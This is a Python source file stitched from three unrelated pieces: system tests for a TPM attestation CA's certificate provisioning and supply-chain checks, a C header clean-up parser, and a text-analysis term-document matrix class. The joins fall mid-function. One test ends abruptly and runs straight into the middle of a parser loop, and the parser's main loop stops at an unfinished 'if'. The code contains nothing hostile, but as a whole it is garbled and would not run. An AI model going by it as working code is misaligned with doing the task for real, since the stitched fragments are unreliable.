logging.info("Uploading CA cert: " + CA_CERT_LOCATION)
AcaPortal.upload_ca_cert(CA_CERT_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("Second provisioner run output: {0}".format(provisioner_out))
supply_chain_validation_summaries = AcaPortal.get_supply_chain_validation_summaries()
# verify this is one SCVS record indicating PASS
self.assertEqual(supply_chain_validation_summaries['recordsTotal'], 2)
self.assertEqual(supply_chain_validation_summaries['data'][0]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][1]['overallValidationResult'], "PASS")
# verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_17_ek_info_report(self):
"""Test that running the hirs provisioner results in storing EK certs info report for
the device in the DB"""
logging.info("***************** Beginning of Endorsement Certs info report test *****************")
logging.info("Getting EK Certs from ACA portal...")
cert_list = AcaPortal.get_ek_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
self.assertEqual(cert_list['data'][0]['credentialType'], "TCPA Trusted Platform Module Endorsement")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_18_pk_info_report(self):
"""Test that running the hirs provisioner results in storing PK certs info report for
the device in the DB"""
logging.info("***************** Beginning Platform Certs info report test *****************")
logging.info("Getting PK Certs from ACA portal...")
cert_list = AcaPortal.get_pk_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
self.assertEqual(cert_list['data'][0]['credentialType'], "TCG Trusted Platform Endorsement")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_19_trust_chain_info_report(self):
"""Test that running the hirs provisioner results in storing trust chains info report for
the device in the DB"""
logging.info("***************** Beginning of Trust Chain info report test *****************")
logging.info("Getting Trust Chains from ACA portal...")
trust_chain_list = AcaPortal.get_trust_chains()
self.assertEqual(trust_chain_list['recordsTotal'], 1)
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A1_base_delta(self):
"""Test Delta Certificates A1 - Provisioning with Good Base Platform Cert (via Platform Cert on TPM Emulator)"""
logging.info("***************** test_20_A1 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert (via Platform Cert on TPM Emulator)")
logging.info("Check if ACA is online...")
AcaPortal.check_is_online()
logging.info("Uploading CA Cert: " + CA_CERT_LOCATION)
AcaPortal.upload_ca_cert(CA_CERT_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A1_base_delta run output: {0}".format(provisioner_out))
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A2_base_delta(self):
"""Test Delta Certificates A2 - Attempt to upload Base cert with holder already having a Base Platform Cert associated with it"""
logging.info("***************** test_20_A2 - Beginning of delta certificate test *****************")
logging.info("Attempt to upload PBaseCertB, with PBaseCertA already loaded in the ACA.")
print("test_20_A2_base_delta. PBaseCertA has already been loaded. Attempting to upload second Platform Cert: %s" % (PBaseCertB_LOCATION))
# Confirm there is one Platform Base Cert already loaded
cert_list = AcaPortal.get_pk_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
print("Number of Platform Certs: %d" % (cert_list['recordsTotal']))
self.assertEqual(cert_list['data'][0]['credentialType'], "TCG Trusted Platform Endorsement")
self.assertEqual(cert_list['data'][0]['platformType'], "Base")
# Try uploading a second Platform Base Cert
print("Attempting to upload a second Platform Base Cert...")
AcaPortal.upload_pk_cert(PBaseCertB_LOCATION)
# Confirm Platform Base Cert has not been loaded
cert_list = AcaPortal.get_pk_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
print("Number of Platform Certs: %d" % (cert_list['recordsTotal']))
self.assertEqual(cert_list['data'][0]['credentialType'], "TCG Trusted Platform Endorsement")
self.assertEqual(cert_list['data'][0]['platformType'], "Base")
if cert_list['recordsTotal'] == 1:
print("SUCCESS.\n")
else:
print("FAILED.\n")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A3_base_delta(self):
"""Test Delta Certificates A3 - Provisioning with Good Base Platform Cert Base and 1 Delta Cert"""
logging.info("***************** test_20_A3 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert Base and 1 Delta Cert")
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
# Upload the SIDeltaCertA1 and provision
AcaPortal.upload_pk_cert(SIDeltaCertA1_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A3_base_delta run output: {0}".format(provisioner_out))
supply_chain_validation_summaries = AcaPortal.get_supply_chain_validation_summaries()
# Verify there are two SCVS records, both indicating PASS
self.assertEqual(supply_chain_validation_summaries['recordsTotal'], 2)
self.assertEqual(supply_chain_validation_summaries['data'][0]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][1]['overallValidationResult'], "PASS")
# Verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A4_base_delta(self):
"""Test Delta Certificates A4 - Provisioning with Good Base Platform Cert Base and 2 Delta Certs"""
logging.info("***************** test_20_A4 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert Base and 2 Delta Certs")
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
# Upload the VARDeltaCertA1 and provision
AcaPortal.upload_pk_cert(VARDeltaCertA1_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A4_base_delta run output: {0}".format(provisioner_out))
supply_chain_validation_summaries = AcaPortal.get_supply_chain_validation_summaries()
# Verify there are three SCVS records, all indicating PASS
self.assertEqual(supply_chain_validation_summaries['recordsTotal'], 3)
self.assertEqual(supply_chain_validation_summaries['data'][0]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][1]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][2]['overallValidationResult'], "PASS")
# Verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A5_base_delta(self):
"""Test Delta Certificates A5 - Provisioning with Good Base Platform Cert and 1 Bad Delta Cert"""
logging.info("***************** test_20_A5 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert and 1 Bad Delta Cert")
# TODO: Determine if we need this test
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A6_base_delta(self):
"""Test Delta Certificates A6 - Provisioning with Good Base Platform, 2 Good Delta Certs and 1 Bad Delta Cert"""
logging.info("***************** test_20_A6 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform, 2 Good Delta Certs and 1 Bad Delta Cert")
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
# Upload the SIDeltaCertA2 and provision
AcaPortal.upload_pk_cert(SIDeltaCertA2_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A6_base_delta SHOULD FAIL provisioning using: %s" % (SIDeltaCertA2_LOCATION))
print("test_20_A6_base_delta run output: {0}".format(provisioner_out))
# Provisioning should fail since the Delta contains a bad component.
self.assertIn("Provisioning failed", format(provisioner_out))
# Upload the SIDeltaCertA2_resolved and provision
AcaPortal.upload_pk_cert(SIDeltaCertA2_resolved_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A6_base_delta SHOULD PASS provisioning using: %s" % (SIDeltaCertA2_resolved_LOCATION))
print("test_20_A6_base_delta run output: {0}".format(provisioner_out))
# Verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A7_base_delta(self):
"""Test Delta Certificates A7 - Provisioning with Good Base Platform, 2 Good Delta Certs and
1 Bad Delta Cert with non present component"""
logging.info("***************** test_20_A7 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform, 2 Good Delta Certs and 1 Bad Delta Cert with non present component")
# Upload the VARDeltaCertA2 and provision
AcaPortal.upload_pk_cert(VARDeltaCertA2_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A7_base_delta SHOULD FAIL provisioning using: %s" % (VARDeltaCertA2_LOCATION))
print("test_20_A7_base_delta run output: {0}".format(provisioner_out))
# Provisioning should fail since the Delta contains a component that's not in the Base
self.assertIn("Provisioning failed", format(provisioner_out))
# Upload the VARDeltaCertA2_resolved and provision
AcaPortal.upload_pk_cert(VARDeltaCertA2_resolved_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A7_base_delta SHOULD PASS provisioning using: %s" % (VARDeltaCertA2_resolved_LOCATION))
print("test_20_A7_base_delta run output: {0}".format(provisioner_out))
# Verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
# that confuses the algorithm
# for finding the end of the structure, or if there is another
# structure definition embedded in the structure.
i = 0
while i < num_tokens - 2:
if (b.tokens[i].kind != TokenKind.KEYWORD or
b.tokens[i].id != "struct"):
i += 1
continue
if (b.tokens[i + 1].kind == TokenKind.IDENTIFIER and
b.tokens[i + 2].kind == TokenKind.PUNCTUATION and
b.tokens[i + 2].id == "{" and b.tokens[i + 1].id in structs):
# Search forward for the end of the structure.
# Very simple search, look for } and ; tokens. If something
# more complicated is needed we can add it later.
j = i + 3
while j < num_tokens - 1:
if (b.tokens[j].kind == TokenKind.PUNCTUATION and
b.tokens[j].id == "}" and
b.tokens[j + 1].kind == TokenKind.PUNCTUATION and
b.tokens[j + 1].id == ";"):
b.tokens = b.tokens[0:i] + b.tokens[j + 2:num_tokens]
num_tokens = len(b.tokens)
j = i
break
j += 1
i = j
continue
i += 1
def optimizeAll(self, macros):
self.optimizeMacros(macros)
self.optimizeIf01()
return
def findIncludes(self):
"""Return the list of included files in a BlockList."""
result = []
for b in self.blocks:
i = b.isInclude()
if i:
result.append(i)
return result
def write(self, out):
indent = 0
for b in self.blocks:
indent = b.write(out, indent)
def removeVarsAndFuncs(self, keep):
"""Remove variable and function declarations.
All extern and static declarations corresponding to variable and
function declarations are removed. We only accept typedefs and
enum/structs/union declarations.
In addition, remove any macro expansions in the headers. Usually,
these macros are static inline functions, which is why they are
removed.
However, we keep the definitions corresponding to the set of known
static inline functions in the set 'keep', which is useful
for optimized byteorder swap functions and stuff like that.
"""
# state = NORMAL => normal (i.e. LN + spaces)
# state = OTHER_DECL => typedef/struct encountered, ends with ";"
# state = VAR_DECL => var declaration encountered, ends with ";"
# state = FUNC_DECL => func declaration encountered, ends with "}"
NORMAL = 0
OTHER_DECL = 1
VAR_DECL = 2
FUNC_DECL = 3
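# Illustrative classification (hypothetical inputs, not from the original file):
#   "typedef unsigned int __u32;"   -> OTHER_DECL, the block is kept
#   "struct foo { int bar; };"      -> OTHER_DECL, the block is kept
#   "extern int foo(int x);"        -> declaration, dropped unless 'foo' is listed in 'keep'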
state = NORMAL
depth = 0
blocksToKeep = []
blocksInProgress = []
blocksOfDirectives = []
ident = ""
state_token = ""
macros = set()
for block in self.blocks:
if block.isDirective():
# Record all macros.
if block.directive == 'define':
macro_name = block.define_id
paren_index = macro_name.find('(')
if paren_index == -1:
macros.add(macro_name)
else:
macros.add(macro_name[0:paren_index])
blocksInProgress.append(block)
# If this is in a function/variable declaration, we might need
# to emit the directives alone, so save them separately.
blocksOfDirectives.append(block)
continue
numTokens = len(block.tokens)
lastTerminatorIndex = 0
i = 0
while i < numTokens:
token_id = block.tokens[i].id
terminator = False
if token_id == '{':
depth += 1
if (i >= 2 and block.tokens[i-2].id == 'extern' and
block.tokens[i-1].id == '"C"'):
# For an extern "C" { pretend as though this is depth 0.
depth -= 1
elif token_id == '}':
if depth > 0:
depth -= 1
if depth == 0:
if state == OTHER_DECL:
# Loop through until we hit the ';'
i += 1
while i < numTokens:
if block.tokens[i].id == ';':
token_id = ';'
break
i += 1
# If we didn't hit the ';', just consider this the
# terminator anyway.
terminator = True
elif depth == 0:
if token_id == ';':
if state == NORMAL:
blocksToKeep.extend(blocksInProgress)
blocksInProgress = []
blocksOfDirectives = []
state = FUNC_DECL
terminator = True
elif (state == NORMAL and token_id == '(' and i >= 1 and
block.tokens[i-1].kind == TokenKind.IDENTIFIER and
block.tokens[i-1].id in macros):
# This is a plain macro being expanded in the header
# which needs to be removed.
blocksToKeep.extend(blocksInProgress)
if lastTerminatorIndex < i - 1:
blocksToKeep.append(Block(block.tokens[lastTerminatorIndex:i-1]))
blocksInProgress = []
blocksOfDirectives = []
# Skip until we see the terminating ')'
i += 1
paren_depth = 1
while i < numTokens:
if block.tokens[i].id == ')':
paren_depth -= 1
if paren_depth == 0:
break
elif block.tokens[i].id == '(':
paren_depth += 1
i += 1
lastTerminatorIndex = i + 1
elif (state != FUNC_DECL and token_id == '(' and
state_token != 'typedef'):
blocksToKeep.extend(blocksInProgress)
blocksInProgress = []
blocksOfDirectives = []
state = VAR_DECL
elif state == NORMAL and token_id in ['struct', 'typedef',
'enum', 'union',
'__extension__']:
state = OTHER_DECL
state_token = token_id
elif block.tokens[i].kind == TokenKind.IDENTIFIER:
if state != VAR_DECL or ident == "":
ident = token_id
if terminator:
if state != VAR_DECL and state != FUNC_DECL or ident in keep:
blocksInProgress.append(Block(block.tokens[lastTerminatorIndex:i+1]))
blocksToKeep.extend(blocksInProgress)
else:
# Only keep the directives found.
blocksToKeep.extend(blocksOfDirectives)
lastTerminatorIndex = i + 1
blocksInProgress = []
blocksOfDirectives = []
state = NORMAL
ident = ""
state_token = ""
i += 1
if lastTerminatorIndex < numTokens:
blocksInProgress.append(Block(block.tokens[lastTerminatorIndex:numTokens]))
if len(blocksInProgress) > 0:
blocksToKeep.extend(blocksInProgress)
self.blocks = blocksToKeep
def replaceTokens(self, replacements):
"""Replace tokens according to the given dict."""
extra_includes = []
for b in self.blocks:
made_change = False
if b.isInclude() is None:
i = 0
while i < len(b.tokens):
tok = b.tokens[i]
if (tok.kind == TokenKind.KEYWORD and tok.id == 'struct'
and (i + 2) < len(b.tokens) and b.tokens[i + 2].id == '{'):
struct_name = b.tokens[i + 1].id
if struct_name in kernel_struct_replacements:
extra_includes.append("<bits/%s.h>" % struct_name)
end = i + 2
while end < len(b.tokens) and b.tokens[end].id != '}':
end += 1
end += 1 # Swallow '}'
while end < len(b.tokens) and b.tokens[end].id != ';':
end += 1
end += 1 # Swallow ';'
# Remove these tokens. We'll replace them later with a #include block.
b.tokens[i:end] = []
made_change = True
# We've just modified b.tokens, so revisit the current offset.
continue
if tok.kind == TokenKind.IDENTIFIER:
if tok.id in replacements:
tok.id = replacements[tok.id]
made_change = True
i += 1
if b.isDefine() and b.define_id in replacements:
b.define_id = replacements[b.define_id]
made_change = True
if made_change and b.isIf():
# Keep 'expr' in sync with 'tokens'.
b.expr = CppExpr(b.tokens)
for extra_include in extra_includes:
replacement = CppStringTokenizer(extra_include)
self.blocks.insert(2, Block(replacement.tokens, directive='include'))
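# Illustrative effect of the struct replacement above (hypothetical example;
# it assumes 'pollfd' appears in kernel_struct_replacements, which is defined
# elsewhere in this module): a block containing
#   struct pollfd { int fd; short events; short revents; };
# is removed from the token stream and
#   #include <bits/pollfd.h>
# is inserted near the top of the block list instead.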
def strip_space(s):
"""Strip out redundant space in a given string."""
# NOTE: This ought to be smarter and avoid destroying spaces inside string tokens.
replacements = {' . ': '.',
' [': '[',
'[ ': '[',
' ]': ']',
'( ': '(',
' )': ')',
' ,': ',',
'# ': '#',
' ;': ';',
'~ ': '~',
' -> ': '->'}
result = s
for r in replacements:
result = result.replace(r, replacements[r])
# Remove the space between function name and the parenthesis.
result = re.sub(r'(\w+) \(', r'\1(', result)
return result
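# Illustrative behaviour of strip_space (hedged examples, worked out from the
# replacement table and regex above):
#   strip_space("foo ( a , b ) ;")      -> "foo(a, b);"
#   strip_space("x [ 3 ] = y -> z ;")   -> "x[3] = y->z;"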
class BlockParser(object):
"""A class that converts an input source file into a BlockList object."""
def __init__(self, tokzer=None):
"""Initialize a block parser.
The input source is provided through a Tokenizer object.
"""
self._tokzer = tokzer
self._parsed = False
@property
def parsed(self):
return self._parsed
@staticmethod
def _short_extent(extent):
return '%d:%d - %d:%d' % (extent.start.line, extent.start.column,
extent.end.line, extent.end.column)
def getBlocks(self, tokzer=None):
"""Return all the blocks parsed."""
def consume_extent(i, tokens, extent=None, detect_change=False):
"""Return tokens that belong to the given extent.
It parses all the tokens that follow tokens[i], until getting out
of the extent. When detect_change is True, it may terminate early
when detecting preprocessing directives inside the extent.
"""
result = []
if extent is None:
extent = tokens[i].cursor.extent
while i < len(tokens) and tokens[i].location in extent:
t = tokens[i]
if debugBlockParser:
print(' ' * 2, t.id, t.kind, t.cursor.kind)
if (detect_change and t.cursor.extent != extent and
t.cursor.kind == CursorKind.PREPROCESSING_DIRECTIVE):
break
result.append(t)
i += 1
return (i, result)
def consume_line(i, tokens):
"""Return tokens that follow tokens[i] in the same line."""
result = []
line = tokens[i].location.line
while i < len(tokens) and tokens[i].location.line == line:
if tokens[i].cursor.kind == CursorKind.PREPROCESSING_DIRECTIVE:
break
result.append(tokens[i])
i += 1
return (i, result)
if tokzer is None:
tokzer = self._tokzer
tokens = tokzer.tokens
blocks = []
buf = []
i = 0
while i < len(tokens):
t = tokens[i]
cursor = t.cursor
if debugBlockParser:
print ("%d: Processing [%s], kind=[%s], cursor=[%s], "
"extent=[%s]" % (t.location.line, t.spelling, t.kind,
cursor.kind,
self._short_extent(cursor.extent)))
if cursor.kind == CursorKind.PREPROCESSING_DIRECTIVE:
# Repository: Anthonyive/scattertext
import collections
import re
import numpy as np
import pandas as pd
from scattertext.CSRMatrixTools import delete_columns, CSRMatrixFactory
from scattertext.FeatureOuput import FeatureLister
from scattertext.Common import SPACY_ENTITY_TAGS, MY_ENGLISH_STOP_WORDS, DEFAULT_BACKGROUND_SCALER_ALGO, \
DEFAULT_BACKGROUND_BETA
from scattertext.frequencyreaders.DefaultBackgroundFrequencies import DefaultBackgroundFrequencies
from scattertext.termranking import AbsoluteFrequencyRanker
from scattertext.termscoring import ScaledFScore
from scattertext.indexstore.IndexStore import IndexStore
class TermDocMatrixWithoutCategories(object):
def __init__(self, X, mX, term_idx_store, metadata_idx_store, unigram_frequency_path=None):
'''
Parameters
----------
X : csr_matrix
term document matrix
mX : csr_matrix
metadata-document matrix
term_idx_store : IndexStore
Term indices
metadata_idx_store : IndexStore
Document metadata indices
unigram_frequency_path : str or None
Path to term frequency file.
'''
self._X = X
self._mX = mX
self._term_idx_store = term_idx_store
self._metadata_idx_store = metadata_idx_store
self._unigram_frequency_path = unigram_frequency_path
self._background_corpus = None
self._strict_unigram_definition = True
def get_default_stoplist(self):
return MY_ENGLISH_STOP_WORDS
def allow_single_quotes_in_unigrams(self):
'''
Don't filter out single quotes in unigrams
:return: self
'''
self._strict_unigram_definition = False
return self
def compact(self, compactor, non_text=False):
'''
Compact term document matrix.
Parameters
----------
compactor : object
Object that takes a Term Doc Matrix as its first argument, and has a compact function which returns a
Term Doc Matrix like argument
non_text : bool
Use non text features. False by default.
Returns
-------
TermDocMatrix
'''
return compactor.compact(self, non_text)
def select(self, compactor, non_text=False):
'''
Same as compact
'''
return compactor.compact(self, non_text)
def get_num_terms(self):
'''
Returns
-------
The number of terms registered in the term doc matrix
'''
return len(self._term_idx_store)
def get_num_docs(self):
'''
Returns
-------
int, number of documents
'''
return self._X.shape[0]
def get_num_metadata(self):
'''
Returns
-------
int, number of unique metadata items
'''
return len(self.get_metadata())
def set_background_corpus(self, background):
'''
Parameters
----------
background
'''
if issubclass(type(background), TermDocMatrixWithoutCategories):
self._background_corpus = pd.DataFrame(background
.get_term_freq_df()
.sum(axis=1),
columns=['background']).reset_index()
self._background_corpus.columns = ['word', 'background']
elif (type(background) == pd.DataFrame
and set(background.columns) == set(['word', 'background'])):
self._background_corpus = background
else:
raise Exception('The argument named background must be a subclass of TermDocMatrix or a ' \
+ 'DataFrame with columns "word" and "background", where "word" ' \
+ 'is the term text, and "background" is its frequency.')
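# Illustrative usage (hypothetical words and counts; assumes `corpus` is an
# instance of this class):
#   >>> bg = pd.DataFrame({'word': ['the', 'of', 'and'],
#   ...                    'background': [22038615, 12545825, 10741073]})
#   >>> corpus.set_background_corpus(bg)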
def get_background_corpus(self):
if self._background_corpus is not None:
return self._background_corpus
return DefaultBackgroundFrequencies.get_background_frequency_df(self._unigram_frequency_path)
def get_term_and_background_counts(self):
'''
Returns
-------
A pd.DataFrame consisting of unigram term counts of words occurring
in the TermDocumentMatrix and their corresponding background corpus
counts. The dataframe has two columns, corpus and background.
>>> corpus.get_unigram_corpus().get_term_and_background_counts()
corpus background
obama 702.0 565739.0
romney 570.0 695398.0
barack 248.0 227861.0
...
'''
background_df = self._get_background_unigram_frequencies()
corpus_freq_df = self.get_term_count_df()
corpus_unigram_freq = self._get_corpus_unigram_freq(corpus_freq_df)
df = corpus_unigram_freq.join(background_df, how='outer').fillna(0)
return df
def get_term_count_df(self):
return pd.DataFrame({'corpus': self._X.sum(axis=0).A1, 'term': self.get_terms()}).set_index('term')
def _get_corpus_unigram_freq(self, corpus_freq_df):
unigram_validator = re.compile('^[A-Za-z]+$')
corpus_unigram_freq = corpus_freq_df.loc[[term for term
in corpus_freq_df.index
if unigram_validator.match(term) is not None]]
return corpus_unigram_freq
def _get_background_unigram_frequencies(self):
if self.get_background_corpus() is not None:
return self.get_background_corpus()
return DefaultBackgroundFrequencies.get_background_frequency_df(self._unigram_frequency_path)
def list_extra_features(self):
'''
Returns
-------
List of dicts. One dict for each document, keys are metadata, values are counts
'''
return FeatureLister(self._mX,
self._metadata_idx_store,
self.get_num_docs()).output()
def get_terms(self):
'''
Returns
-------
np.array of unique terms
'''
return self._term_idx_store._i2val
def get_metadata(self):
'''
Returns
-------
np.array of unique metadata
'''
return self._metadata_idx_store._i2val
def get_total_unigram_count(self):
return self._get_unigram_term_freq_df().sum()
def _get_unigram_term_freq_df(self):
return self._get_corpus_unigram_freq(
# self.get_term_freq_df().sum(axis=1)
self.get_term_count_df()['corpus']
)
def _get_X_after_delete_terms(self, idx_to_delete_list, non_text=False):
new_term_idx_store = self._get_relevant_idx_store(non_text).batch_delete_idx(idx_to_delete_list)
new_X = delete_columns(self._get_relevant_X(non_text), idx_to_delete_list)
return new_X, new_term_idx_store
def _get_relevant_X(self, non_text):
return self._mX if non_text else self._X
def _get_relevant_idx_store(self, non_text):
return self._metadata_idx_store if non_text else self._term_idx_store
def remove_infrequent_words(self, minimum_term_count, term_ranker=AbsoluteFrequencyRanker):
'''
Returns
-------
A new TermDocumentMatrix consisting of only terms which occur at least minimum_term_count times.
'''
tdf = term_ranker(self).get_ranks().sum(axis=1)
return self.remove_terms(list(tdf[tdf <= minimum_term_count].index))
def remove_entity_tags(self):
'''
Returns
-------
A new TermDocumentMatrix consisting of only terms in the current TermDocumentMatrix
that aren't spaCy entity tags.
Note: Used if entity types are censored using FeatsFromSpacyDoc(tag_types_to_censor=...).
'''
terms_to_remove = [term for term in self._term_idx_store._i2val
if any([word in SPACY_ENTITY_TAGS for word in term.split()])]
return self.remove_terms(terms_to_remove)
def remove_terms(self, terms, ignore_absences=False, non_text=False):
'''Non destructive term removal.
Parameters
----------
terms : list
list of terms to remove
ignore_absences : bool, False by default
If term does not appear, don't raise an error, just move on.
non_text : bool, False by default
Remove metadata terms instead of regular terms
Returns
-------
TermDocMatrix, new object with terms removed.
'''
idx_to_delete_list = self._build_term_index_list(ignore_absences, terms, non_text)
return self.remove_terms_by_indices(idx_to_delete_list, non_text)
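# Illustrative usage (assumes `corpus` is an instance of this class):
#   >>> smaller_corpus = corpus.remove_terms(['the', 'of'], ignore_absences=True)
# The original `corpus` is left untouched; a new object is returned.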
def whitelist_terms(self, whitelist_terms):
'''
:param whitelist_terms: list[str], terms to whitelist
:return: TermDocMatrix, new object with only terms in parameter
'''
return self.remove_terms(list(set(self.get_terms()) - set(whitelist_terms)))
def _build_term_index_list(self, ignore_absences, terms, non_text=False):
idx_to_delete_list = []
my_term_idx_store = self._get_relevant_idx_store(non_text)
for term in terms:
if term not in my_term_idx_store:
if not ignore_absences:
raise KeyError('Term %s not found' % (term))
continue
idx_to_delete_list.append(my_term_idx_store.getidx(term))
return idx_to_delete_list
def _make_new_term_doc_matrix(self,
new_X=None,
new_mX=None,
new_y=None,
new_term_idx_store=None,
new_category_idx_store=None,
new_metadata_idx_store=None,
new_y_mask=None):
return TermDocMatrixWithoutCategories(
X=new_X if new_X is not None else self._X,
mX=new_mX if new_mX is not None else self._mX,
term_idx_store=new_term_idx_store if new_term_idx_store is not None else self._term_idx_store,
metadata_idx_store=new_metadata_idx_store if new_metadata_idx_store is not None else self._metadata_idx_store,
unigram_frequency_path=self._unigram_frequency_path
)
def remove_terms_used_in_less_than_num_docs(self, threshold, non_text=False):
'''
Parameters
----------
threshold: int
Minimum number of documents term should appear in to be kept
non_text: bool
Use non-text features instead of terms
Returns
-------
TermDocMatrix, new object with terms removed.
'''
term_counts = self._get_relevant_X(non_text).astype(bool).astype(int).sum(axis=0).A[0]
terms_to_remove = np.where(term_counts < threshold)[0]
return self.remove_terms_by_indices(terms_to_remove, non_text)
def remove_document_ids(self, document_ids, remove_unused_terms=True, remove_unused_metadata=False):
'''
:param document_ids: List[int], list of document ids to remove
:return: Corpus
'''
y_mask = ~np.isin(np.arange(self.get_num_docs()), np.array(document_ids))
updated_tdm = self._make_new_term_doc_matrix(
new_X=self._X,
new_mX=self._mX,
new_y=None,
new_category_idx_store=None,
new_term_idx_store=self._term_idx_store,
new_metadata_idx_store=self._metadata_idx_store,
new_y_mask=y_mask
)
if remove_unused_terms:
unused_term_idx = np.where(self._X[y_mask, :].sum(axis=0) == 0)[1]
updated_tdm = updated_tdm.remove_terms_by_indices(unused_term_idx, non_text=False)
if remove_unused_metadata:
# Mirror the np.where-based index lookup used for unused terms above
unused_metadata_idx = np.where(self._mX[y_mask, :].sum(axis=0) == 0)[1]
updated_tdm = updated_tdm.remove_terms_by_indices(unused_metadata_idx, non_text=True)
return updated_tdm
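# Illustrative usage (assumes `corpus` is an instance of this class):
#   >>> pruned = corpus.remove_document_ids([0, 5, 7])
# With the default remove_unused_terms=True, terms that only occurred in the
# removed documents are dropped as well.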
def remove_documents_less_than_length(self, max_length, non_text=False):
'''
:param max_length: int, minimum number of corpus terms a document must contain to be kept
:return: Corpus
'''
tdm = self.get_metadata_doc_mat() if non_text else self.get_term_doc_mat()
doc_ids_to_remove = np.where(tdm.sum(axis=1).T.A1 < max_length)
return self.remove_document_ids(doc_ids_to_remove)
def get_unigram_corpus(self):
'''
Returns
-------
A new TermDocumentMatrix consisting of only unigrams in the current TermDocumentMatrix.
'''
terms_to_ignore = self._get_non_unigrams()
return self.remove_terms(terms_to_ignore)
def _get_non_unigrams(self):
return [term for term
in self._term_idx_store._i2val
if ' ' in term or (self._strict_unigram_definition and "'" in term)
]
def get_stoplisted_unigram_corpus(self, stoplist=None):
'''
Parameters
-------
stoplist : list, optional
Returns
-------
A new TermDocumentMatrix consisting of only unigrams in the current TermDocumentMatrix.
'''
if stoplist is None:
stoplist = self.get_default_stoplist()
else:
stoplist = [w.lower() for w in stoplist]
return self._remove_terms_from_list(stoplist)
def get_stoplisted_unigram_corpus_and_custom(self,
custom_stoplist):
'''
Parameters
-------
custom_stoplist : list of lower-cased words, or a single word as a str
Returns
-------
A new TermDocumentMatrix consisting of only unigrams in the current TermDocumentMatrix.
'''
if type(custom_stoplist) == str:
custom_stoplist = [custom_stoplist]
return self._remove_terms_from_list(set(self.get_default_stoplist())
| set(w.lower() for w in custom_stoplist))
